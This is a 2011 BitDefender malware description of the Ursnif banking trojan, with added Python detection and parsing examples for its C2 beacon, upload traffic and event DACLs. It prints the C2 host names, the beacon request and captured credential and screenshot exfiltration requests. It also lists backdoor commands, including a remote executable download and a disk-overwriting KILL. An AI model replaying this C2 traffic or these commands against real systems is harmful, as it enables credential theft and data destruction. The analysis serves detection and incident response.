
Trojan.Spy.Ursnif.F


First posted on 21 November 2011.
Source: BitDefender

Aliases:

There are no other names known for Trojan.Spy.Ursnif.F.

Explanation:

Trojan.Spy.Ursnif is malware that is able to steal personal information and take control of the infected computer.

It finds out the type of browser (iexplore, firefox, safari, chrome, opera); this information is used later for stealing browser-specific passwords.
It takes a snapshot of all the processes and injects itself into iexplore or firefox and also hooks some functions: InternetReadFile,
InternetWriteFile, CreateProcess, HttpSendRequest, to intercept browser traffic.

The backdoor behaviour starts when it connects to a server that appears under different host names: rettinasl.com, hasterulits.com, thecargotime.com, tryfindithere.com. From time to time it sends requests to the server. The request has a standard form:
GET /cgi-bin/cmd.cgi?user_id=2806922672&version_id=2037028&passphrase=fkjvhsdvlksdhvlsd&socks=0&version=2037028&crc=00000000 HTTP/1.1

The version_id is stored in a registry value:

Subkey = HKCU\Software\AppDataLow\{0a7cdb08-42c7-a17a-bc91-b0554eeb624f}
Value = Version
Data = Hex:001F1524, Decimal:2037028
The user_id is random.
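A defender reading the beacon above mostly wants two things: to recognise the request in proxy logs even when the host name rotates, and to tie the version_id in the query string to the Version registry value. The Python below is an added example, not part of the BitDefender description; it assumes a hypothetical proxy log format of `client method url status` (the sample lines are constructed) and flags a line either because the host is one of the four named above or because the request carries the full cmd.cgi parameter set:

```python
import re
from urllib.parse import urlsplit, parse_qs

# C2 host names named in the description.
URSNIF_C2_HOSTS = {
    "rettinasl.com", "hasterulits.com", "thecargotime.com", "tryfindithere.com",
}

# Query parameters the cmd.cgi beacon carries (taken from the sample request).
BEACON_PARAMS = {"user_id", "version_id", "passphrase", "socks", "version", "crc"}

# Constructed proxy log lines in a hypothetical "client method url status" format.
# Line 3 uses an unlisted host on purpose: C2 domains rotate, the parameter set does not.
SAMPLE_LOG = """\
10.0.0.5 GET http://rettinasl.com/cgi-bin/cmd.cgi?user_id=2806922672&version_id=2037028&passphrase=fkjvhsdvlksdhvlsd&socks=0&version=2037028&crc=00000000 200
10.0.0.5 GET http://www.example.com/index.html 200
10.0.0.7 GET http://unknown-host.invalid/cgi-bin/cmd.cgi?user_id=1&version_id=2037028&passphrase=x&socks=0&version=2037028&crc=00000000 200
10.0.0.9 POST http://thecargotime.com/cgi-bin/ss.cgi 200
"""


def registry_version_to_int(hex_data):
    """Convert the DWORD shown in the registry dump (e.g. '001F1524') to decimal."""
    return int(hex_data, 16)


def classify_request(method, url):
    """Return the reasons a request looks like Ursnif C2 traffic (empty list = nothing seen)."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    query = parse_qs(parts.query)
    reasons = []
    if host in URSNIF_C2_HOSTS:
        reasons.append("known C2 host")
    if method == "GET" and parts.path == "/cgi-bin/cmd.cgi" and BEACON_PARAMS <= set(query):
        reasons.append("cmd.cgi beacon parameter set")
    if method == "POST" and parts.path in ("/cgi-bin/forms.cgi", "/cgi-bin/ss.cgi"):
        reasons.append("forms.cgi/ss.cgi upload path")
    return reasons


def scan_log(text):
    """Return one dict per suspicious log line, with the bot identifiers pulled from the query."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 3:
            continue
        client, method, url = fields[0], fields[1], fields[2]
        reasons = classify_request(method, url)
        if not reasons:
            continue
        query = parse_qs(urlsplit(url).query)
        hits.append({
            "client": client,
            "url": url,
            "reasons": reasons,
            "user_id": query.get("user_id", [None])[0],
            "version_id": query.get("version_id", [None])[0],
        })
    return hits


if __name__ == "__main__":
    build = registry_version_to_int("001F1524")
    for hit in scan_log(SAMPLE_LOG):
        same_build = hit["version_id"] is not None and int(hit["version_id"]) == build
        print(hit["client"], hit["reasons"], "user_id=%s" % hit["user_id"],
              "matches registry Version" if same_build else "")
```

Keying on the parameter set rather than the host list is what catches the third sample line; the host list still adds confidence for the two domains that are known. The version_id recovered from the beacon (2037028) equals the registry DWORD 0x001F1524, so a responder can confirm on disk which bot build a given log line belongs to.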

If the request succeeds and the connection is established the malware takes control:
- it receives commands:
  - download - DL_EXE=http://ne[removed].cn/sol.exe /DL_EXE_ST=http://ne[removed].cn /sol.exe;
  - kill windows - KILL (writes a 0x10000-byte buffer, the module of the current process, to "\\.\C:");
  - reboot system - REBOOT;
  - take screenshots - SCREENSHOT;
  - delete cookies - CLEAR_COOK;

- when the user logs on to different internet accounts it sends the private information (user names, passwords) to a remote location;
example Wireshark capture:

POST /cgi-bin/forms.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------2b01852b01852b0185
User-Agent: IE
Host: tryfindithere.com
Content-Length: 337
Cache-Control: no-cache
----------------------------2b01852b01852b0185
Content-Disposition: form-data; name="upload_file"; filename="2806922672.2037028"
Content-Type: application/octet-stream
URL: http://fa[removed]war.com/index.php
login_username=TEST&login_password=TEST&serverid=1&submitit.x=89&submitit.y=23

- it downloads an encrypted buffer to a memory location that contains:
  - the names of some bank websites: millenniumbcp.pt, santandertotta.pt, grupobanif, caixaebanking.cgd.pt;
  - some javascript code to identify and steal passwords, user names, card PINs from those bank websites;

- also when the user logs on to those bank websites, screenshot pictures are sent to a remote location;
example Wireshark capture:

POST /cgi-bin/ss.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------905c4c905c4c905c4c
User-Agent: IE
Host: thecargotime.com
Content-Length: 146030
Cache-Control: no-cache
----------------------------905c4c905c4c905c4c
Content-Disposition: form-data; name="upload_file"; filename="2806922672.2037028"
Content-Type: application/octet-stream

GIF1
GIF2...
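Both uploads above (the forms.cgi credential post and the ss.cgi screenshot post) share one shape: a multipart POST whose single part is named upload_file and whose filename is "<user_id>.<version_id>", the same pair of identifiers the cmd.cgi beacon sends. When scoping an incident from a capture, the useful step is to parse that structure and record which victim, which build and which kind of data each upload carried, without logging the stolen values themselves. The parser below is an added example written for this page, not BitDefender's code. The two sample requests are constructed from the captures shown: the forms.cgi body is reproduced as printed (with the Content-Length header dropped, since this sample is not the original 337 bytes), and the ss.cgi body is replaced by a minimal GIF header standing in for the screenshot:

```python
import re
from urllib.parse import parse_qs

BOUNDARY_FORMS = b"--------------------------2b01852b01852b0185"
BOUNDARY_SS = b"--------------------------905c4c905c4c905c4c"

# Constructed from the forms.cgi capture in the description (TEST credentials as shown there).
SAMPLE_FORMS_POST = (
    b"POST /cgi-bin/forms.cgi HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=" + BOUNDARY_FORMS + b"\r\n"
    b"User-Agent: IE\r\n"
    b"Host: tryfindithere.com\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
    b"--" + BOUNDARY_FORMS + b"\r\n"
    b'Content-Disposition: form-data; name="upload_file"; filename="2806922672.2037028"\r\n'
    b"Content-Type: application/octet-stream\r\n"
    b"\r\n"
    b"URL: http://fa[removed]war.com/index.php\r\n"
    b"login_username=TEST&login_password=TEST&serverid=1&submitit.x=89&submitit.y=23\r\n"
    b"--" + BOUNDARY_FORMS + b"--\r\n"
)

# Constructed from the ss.cgi capture; the body is a minimal 1x1 GIF instead of a real screenshot.
SAMPLE_SCREENSHOT_POST = (
    b"POST /cgi-bin/ss.cgi HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=" + BOUNDARY_SS + b"\r\n"
    b"User-Agent: IE\r\n"
    b"Host: thecargotime.com\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
    b"--" + BOUNDARY_SS + b"\r\n"
    b'Content-Disposition: form-data; name="upload_file"; filename="2806922672.2037028"\r\n'
    b"Content-Type: application/octet-stream\r\n"
    b"\r\n"
    b"GIF89a\x01\x00\x01\x00\x00\x00\x00;\r\n"
    b"--" + BOUNDARY_SS + b"--\r\n"
)


def parse_headers(head):
    """Split an HTTP request head into (method, path, {lower-case header name: value})."""
    request_line, *header_lines = head.decode("latin-1").split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def split_multipart(body, boundary):
    """Yield (part_head, part_body) byte pairs for each part between the delimiters."""
    delimiter = b"--" + boundary
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):        # closing delimiter: boundary followed by "--"
            break
        # Trim exactly one CRLF on each side so binary bodies are not altered.
        if chunk.startswith(b"\r\n"):
            chunk = chunk[2:]
        if chunk.endswith(b"\r\n"):
            chunk = chunk[:-2]
        part_head, _, part_body = chunk.partition(b"\r\n\r\n")
        yield part_head, part_body


def parse_upload(raw):
    """Summarise one Ursnif upload: victim id, build, destination and the kind of data sent."""
    head, _, body = raw.partition(b"\r\n\r\n")
    method, path, headers = parse_headers(head)
    m = re.search(r"boundary=(\S+)", headers.get("content-type", ""))
    if method != "POST" or not m:
        return None
    summary = {"host": headers.get("host"), "path": path, "kind": "unknown",
               "victim_id": None, "build": None, "target_url": None, "credential_fields": []}
    for part_head, part_body in split_multipart(body, m.group(1).encode()):
        fn = re.search(rb'filename="([^"]*)"', part_head)
        if fn:
            # filename is "<user_id>.<version_id>", the identifiers also seen in the cmd.cgi beacon
            victim_id, _, build = fn.group(1).decode().partition(".")
            summary["victim_id"], summary["build"] = victim_id, build
        if part_body.startswith(b"GIF8"):          # GIF magic: a screenshot upload
            summary["kind"] = "screenshot"
        elif part_body.startswith(b"URL: "):       # captured form: URL line, then the form body
            summary["kind"] = "credentials"
            url_line, _, form = part_body.partition(b"\r\n")
            summary["target_url"] = url_line[5:].decode("latin-1")
            fields = parse_qs(form.decode("latin-1"))
            # Record which fields look like credentials; the values are never copied out.
            summary["credential_fields"] = sorted(
                k for k in fields if "user" in k.lower() or "pass" in k.lower())
    return summary


if __name__ == "__main__":
    for sample in (SAMPLE_FORMS_POST, SAMPLE_SCREENSHOT_POST):
        print(parse_upload(sample))
```

The filename convention is the pivot worth keeping: it lets a capture of forms.cgi or ss.cgi traffic be linked to the cmd.cgi beacons from the same bot, and to the Version registry value on the host, even when the upload goes to a different domain than the beacon did (tryfindithere.com and thecargotime.com in the two captures).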

It creates events with restricted rights: access is denied for guest and anonymous users (D:(D;OICI;GA;;;BG)(D;OICI;GA;;;AN)(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)).
Every action is executed by threads that are synchronized using critical sections or events.
It uses a pipe for communication between threads (read/write).
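The security descriptor string above is compact SDDL: two deny ACEs for Builtin Guests (BG) and Anonymous Logon (AN), then two allow ACEs for Authenticated Users (AU) and Builtin Administrators (BA), each granting GENERIC_ALL (GA) with object and container inheritance (OICI). A responder who dumps the DACL of the malware's named events will want to read such strings quickly; the small parser below is an added example, not part of the description, and its `effective_access` is a deliberate simplification (it matches the trustee SID literally and does not expand group membership, which Windows does):

```python
import re

# The DACL string quoted in the description.
EVENT_SDDL = "D:(D;OICI;GA;;;BG)(D;OICI;GA;;;AN)(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)"

ACE_TYPES = {"A": "allow", "D": "deny"}

# SDDL well-known SID aliases that occur in the string above.
SID_ALIASES = {
    "BG": "Builtin Guests",
    "AN": "Anonymous Logon",
    "AU": "Authenticated Users",
    "BA": "Builtin Administrators",
}


def parse_dacl(sddl):
    """Parse the D: section of an SDDL string into ACE dicts, in the order written."""
    m = re.search(r"D:[^(]*((?:\([^)]*\))*)", sddl)
    if not m:
        raise ValueError("no DACL section in SDDL string")
    aces = []
    for ace in re.findall(r"\(([^)]*)\)", m.group(1)):
        # ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid
        ace_type, flags, rights, _obj_guid, _inh_guid, sid = ace.split(";")
        aces.append({
            "type": ACE_TYPES.get(ace_type, ace_type),
            "flags": flags,
            "rights": rights,
            "sid": sid,
            "trustee": SID_ALIASES.get(sid, sid),
        })
    return aces


def effective_access(aces, sid):
    """Simplified check: a deny ACE naming the SID wins, an allow grants, no ACE means no access.
    Real evaluation also expands the token's group SIDs and compares the requested rights."""
    if any(a["type"] == "deny" and a["sid"] == sid for a in aces):
        return "deny"
    if any(a["type"] == "allow" and a["sid"] == sid for a in aces):
        return "allow"
    return "none"


if __name__ == "__main__":
    aces = parse_dacl(EVENT_SDDL)
    for a in aces:
        print("%-5s %-4s %-2s %s" % (a["type"], a["flags"], a["rights"], a["trustee"]))
    for sid in ("BG", "AN", "AU", "BA", "WD"):
        print(sid, "->", effective_access(aces, sid))
```

Placing the deny entries before the allow entries is the canonical ACE order, so the descriptor really does block guest and anonymous tokens even though Authenticated Users is granted full access afterwards; a principal not named at all (for example the Everyone alias WD) gets nothing, because a DACL with no matching ACE denies by default.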

Last update 21 November 2011